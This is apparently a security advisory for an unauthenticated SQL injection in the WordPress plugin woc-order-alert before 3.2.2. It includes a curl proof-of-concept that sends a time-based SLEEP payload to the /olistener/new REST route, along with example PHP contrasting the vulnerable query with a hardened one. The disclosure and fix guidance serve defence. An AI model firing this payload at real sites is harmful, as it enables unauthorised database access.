The plugin does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
```shell
curl 'http://example.com/?rest_route=/olistener/new' --data '{"id":" (SELECT SLEEP(3))#"}' -H 'content-type: application/json'
```
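As an added illustration (not the plugin's own code), the pattern the advisory describes and its fix in a WordPress REST handler: the route name follows the PoC above, while the table name, function names and the capability used in the permission check are assumptions for the example.

```php
<?php
// Added example, not taken from woc-order-alert. Table name, function names
// and the capability check are assumptions.

// Vulnerable pattern: the untrusted "id" value is concatenated into the query,
// and the route is reachable by anyone because permission_callback allows all.
function listener_new_vulnerable( WP_REST_Request $request ) {
    global $wpdb;
    $id  = $request->get_param( 'id' );
    $sql = "SELECT * FROM {$wpdb->prefix}order_alerts WHERE id = " . $id;
    return rest_ensure_response( $wpdb->get_results( $sql ) );
}

// Hardened pattern: the value is coerced to an integer and bound through
// $wpdb->prepare(), so nothing from the request reaches the SQL text.
function listener_new_hardened( WP_REST_Request $request ) {
    global $wpdb;
    $id = absint( $request->get_param( 'id' ) );
    if ( 0 === $id ) {
        return new WP_Error( 'rest_invalid_param', 'id must be a positive integer', array( 'status' => 400 ) );
    }
    $sql = $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}order_alerts WHERE id = %d", $id );
    return rest_ensure_response( $wpdb->get_results( $sql ) );
}

// Register the route with both a permission check and parameter validation,
// so unauthenticated callers receive 401 and non-numeric ids receive 400.
add_action( 'rest_api_init', function () {
    register_rest_route( 'olistener', '/new', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'listener_new_hardened',
        'permission_callback' => function () {
            // Assumed capability; pick the narrowest one the feature needs.
            return current_user_can( 'manage_options' );
        },
        'args'                => array(
            'id' => array(
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );
```

The time-based payload in the PoC stops working against the hardened handler because the value is rejected at validation and, even if it were numeric, is bound as an integer rather than spliced into the statement.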
CPE

| Name | Operator | Version |
|---|---|---|
| woc-order-alert | lt | 3.2.2 |